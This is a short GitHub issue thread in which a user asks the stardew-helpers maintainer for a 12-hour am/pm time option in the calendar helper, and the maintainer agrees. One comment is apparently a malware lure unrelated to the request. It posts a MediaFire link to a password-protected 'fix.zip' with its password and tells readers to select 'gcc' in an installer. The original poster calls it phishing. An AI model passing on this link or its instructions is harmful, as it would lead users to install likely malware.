### ISSUE TITLE
12/24 hr time option?

### ISSUE THREAD

**Issue by rossc719g** [rickselby/stardew-helpers#415]
Any chance there could be a toggle to use 12 hour (am/pm) time rather than 24h (military) time for the calendar helper?
The game displays things like "4:50pm" rather than "16:50" and as I am a bear of very little brain, subtracting 12 is something that is easier done by the computer than on my fingers.  :-)

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rossc719g** [comment]
> Download [redacted] In the installer menu, select "gcc."

Gee thanks, I love blatant phishing attempts, and viruses!  It must be my birthday!

**Comment by rickselby** [comment]
I'm happy to switch to 12 hour as that's what is used in game. The schedule files come as 24 hour so I just stuck with that.

**Comment by rossc719g** [comment]
Thanks!
